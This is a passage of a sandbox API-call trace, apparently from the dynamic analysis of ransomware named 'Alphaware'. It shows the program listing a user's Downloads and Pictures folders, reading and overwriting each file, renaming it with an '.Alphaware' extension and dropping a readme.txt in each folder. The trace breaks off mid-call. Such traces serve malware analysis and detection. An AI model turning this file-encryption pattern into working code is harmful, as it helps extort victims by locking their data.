[0085.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0085.244] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\downloads\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\downloads\\desktop.ini.alphaware")) returned 1 [0085.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0085.246] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\downloads\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.247] GetFileType (hFile=0x254) returned 0x1 [0085.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0085.247] GetFileType (hFile=0x254) returned 0x1 [0085.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0085.249] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x85029a40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85029a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.249] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x84f914c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0085.249] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85029a40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85029a40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85029a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0085.249] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85029a40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85029a40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85029a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0085.249] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0085.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0085.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0085.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0085.249] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcb6d5100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcb6d5100, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.249] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc27b56f0, ftCreationTime.dwHighDateTime=0x1d96fe4, ftLastAccessTime.dwLowDateTime=0x1d7ff830, ftLastAccessTime.dwHighDateTime=0x1d975d5, ftLastWriteTime.dwLowDateTime=0x1d7ff830, ftLastWriteTime.dwHighDateTime=0x1d975d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGtmsH0_nmfPfsQOHtip", cAlternateFileName="CGTMSH~1")) returned 1 [0085.250] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ee72bc0, ftCreationTime.dwHighDateTime=0x1d967d7, ftLastAccessTime.dwLowDateTime=0x48a5c910, ftLastAccessTime.dwHighDateTime=0x1d97268, ftLastWriteTime.dwLowDateTime=0x48a5c910, ftLastWriteTime.dwHighDateTime=0x1d97268, nFileSizeHigh=0x0, nFileSizeLow=0xd752, dwReserved0=0x0, dwReserved1=0x0, cFileName="CKk3Lv0r a.png", cAlternateFileName="CKK3LV~1.PNG")) returned 1 [0085.250] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.250] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561aa0, ftCreationTime.dwHighDateTime=0x1d970fd, ftLastAccessTime.dwLowDateTime=0xc837ddf0, ftLastAccessTime.dwHighDateTime=0x1d97351, ftLastWriteTime.dwLowDateTime=0xc837ddf0, ftLastWriteTime.dwHighDateTime=0x1d97351, nFileSizeHigh=0x0, nFileSizeLow=0x11a3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="q_m8XgrWlwVpa_ok Jpb.jpg", cAlternateFileName="Q_M8XG~1.JPG")) returned 1 [0085.250] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b116d0, ftCreationTime.dwHighDateTime=0x1d96686, ftLastAccessTime.dwLowDateTime=0xe0bfd080, ftLastAccessTime.dwHighDateTime=0x1d97180, ftLastWriteTime.dwLowDateTime=0xe0bfd080, ftLastWriteTime.dwHighDateTime=0x1d97180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sD_Mf", cAlternateFileName="")) returned 1 [0085.250] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139e870, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x5f3e4290, ftLastAccessTime.dwHighDateTime=0x1d974c7, ftLastWriteTime.dwLowDateTime=0x5f3e4290, ftLastWriteTime.dwHighDateTime=0x1d974c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="w0y6K3cxjraf-y2uE6", cAlternateFileName="W0Y6K3~1")) returned 1 [0085.250] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139e870, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x5f3e4290, ftLastAccessTime.dwHighDateTime=0x1d974c7, ftLastWriteTime.dwLowDateTime=0x5f3e4290, ftLastWriteTime.dwHighDateTime=0x1d974c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="w0y6K3cxjraf-y2uE6", cAlternateFileName="W0Y6K3~1")) returned 0 [0085.250] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0085.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0085.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0085.250] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png", dwFileAttributes=0x80) returned 1 [0085.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0085.251] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ckk3lv0r a.png"), fInfoLevelId=0x0, lpFileInformation=0x2546958 | out: lpFileInformation=0x2546958*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9ee72bc0, ftCreationTime.dwHighDateTime=0x1d967d7, ftLastAccessTime.dwLowDateTime=0x48a5c910, ftLastAccessTime.dwHighDateTime=0x1d97268, ftLastWriteTime.dwLowDateTime=0x48a5c910, ftLastWriteTime.dwHighDateTime=0x1d97268, nFileSizeHigh=0x0, nFileSizeLow=0xd752)) returned 1 [0085.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0085.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0085.251] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ckk3lv0r a.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.251] GetFileType (hFile=0x254) returned 0x1 [0085.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0085.252] GetFileType (hFile=0x254) returned 0x1 [0085.252] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xd752 [0085.252] ReadFile (in: hFile=0x254, lpBuffer=0x2546b90, nNumberOfBytesToRead=0xd752, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2546b90*, lpNumberOfBytesRead=0x23eb38*=0xd752, lpOverlapped=0x0) returned 1 [0085.253] CloseHandle (hObject=0x254) returned 1 [0085.438] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png", lpFilePart=0x0) returned 0x2a [0085.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0085.438] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ckk3lv0r a.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.442] GetFileType (hFile=0x254) returned 0x1 [0085.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0085.442] GetFileType (hFile=0x254) returned 0x1 [0085.443] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.446] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.447] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.447] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.447] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.447] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.448] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.448] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.448] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.448] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.449] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.449] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.449] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.450] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.450] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.450] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.451] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0085.451] WriteFile (in: hFile=0x254, lpBuffer=0x2475f20*, nNumberOfBytesToWrite=0xff4, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2475f20*, lpNumberOfBytesWritten=0x23e9f8*=0xff4, lpOverlapped=0x0) returned 1 [0085.451] CloseHandle (hObject=0x254) returned 1 [0085.458] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png", lpFilePart=0x0) returned 0x2a [0085.458] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png.Alphaware", lpFilePart=0x0) returned 0x34 [0085.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0085.459] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ckk3lv0r a.png"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ee72bc0, ftCreationTime.dwHighDateTime=0x1d967d7, ftLastAccessTime.dwLowDateTime=0x48a5c910, ftLastAccessTime.dwHighDateTime=0x1d97268, ftLastWriteTime.dwLowDateTime=0x85218c20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11ff4)) returned 1 [0085.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0085.461] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ckk3lv0r a.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\CKk3Lv0r a.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\ckk3lv0r a.png.alphaware")) returned 1 [0085.469] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\readme.txt", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\readme.txt", lpFilePart=0x0) returned 0x26 [0085.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0085.470] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.472] GetFileType (hFile=0x254) returned 0x1 [0085.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0085.472] GetFileType (hFile=0x254) returned 0x1 [0085.479] WriteFile (in: hFile=0x254, lpBuffer=0x2479330*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23eae8, lpOverlapped=0x0 | out: lpBuffer=0x2479330*, lpNumberOfBytesWritten=0x23eae8*=0x49d, lpOverlapped=0x0) returned 1 [0085.482] CloseHandle (hObject=0x254) returned 1 [0085.501] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x27 [0085.501] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0085.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0085.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x247b520 | out: lpFileInformation=0x247b520*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0085.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0085.502] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x27 [0085.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0085.502] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.502] GetFileType (hFile=0x254) returned 0x1 [0085.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0085.502] GetFileType (hFile=0x254) returned 0x1 [0085.502] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x1f8 [0085.502] ReadFile (in: hFile=0x254, lpBuffer=0x247b930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x247b930*, lpNumberOfBytesRead=0x23eb38*=0x1f8, lpOverlapped=0x0) returned 1 [0085.504] CloseHandle (hObject=0x254) returned 1 [0085.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0085.541] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\pictures\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.542] GetFileType (hFile=0x254) returned 0x1 [0085.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0085.542] GetFileType (hFile=0x254) returned 0x1 [0085.543] WriteFile (in: hFile=0x254, lpBuffer=0x24f9ff8*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24f9ff8*, lpNumberOfBytesWritten=0x23e9f8*=0x374, lpOverlapped=0x0) returned 1 [0085.544] CloseHandle (hObject=0x254) returned 1 [0085.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0085.546] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x852fd460, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374)) returned 1 [0085.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0085.547] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\pictures\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\desktop.ini.alphaware")) returned 1 [0085.554] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg", lpFilePart=0x0) returned 0x34 [0085.554] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg", dwFileAttributes=0x80) returned 1 [0085.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0085.555] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\q_m8xgrwlwvpa_ok jpb.jpg"), fInfoLevelId=0x0, lpFileInformation=0x24fb490 | out: lpFileInformation=0x24fb490*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x561aa0, ftCreationTime.dwHighDateTime=0x1d970fd, ftLastAccessTime.dwLowDateTime=0xc837ddf0, ftLastAccessTime.dwHighDateTime=0x1d97351, ftLastWriteTime.dwLowDateTime=0xc837ddf0, ftLastWriteTime.dwHighDateTime=0x1d97351, nFileSizeHigh=0x0, nFileSizeLow=0x11a3e)) returned 1 [0085.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0085.556] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg", lpFilePart=0x0) returned 0x34 [0085.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0085.556] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\q_m8xgrwlwvpa_ok jpb.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.557] GetFileType (hFile=0x254) returned 0x1 [0085.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0085.557] GetFileType (hFile=0x254) returned 0x1 [0085.557] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x11a3e [0085.558] ReadFile (in: hFile=0x254, lpBuffer=0x24fb728, nNumberOfBytesToRead=0x11a3e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24fb728*, lpNumberOfBytesRead=0x23eb38*=0x11a3e, lpOverlapped=0x0) returned 1 [0085.561] CloseHandle (hObject=0x254) returned 1 [0085.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0085.595] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg" (normalized: 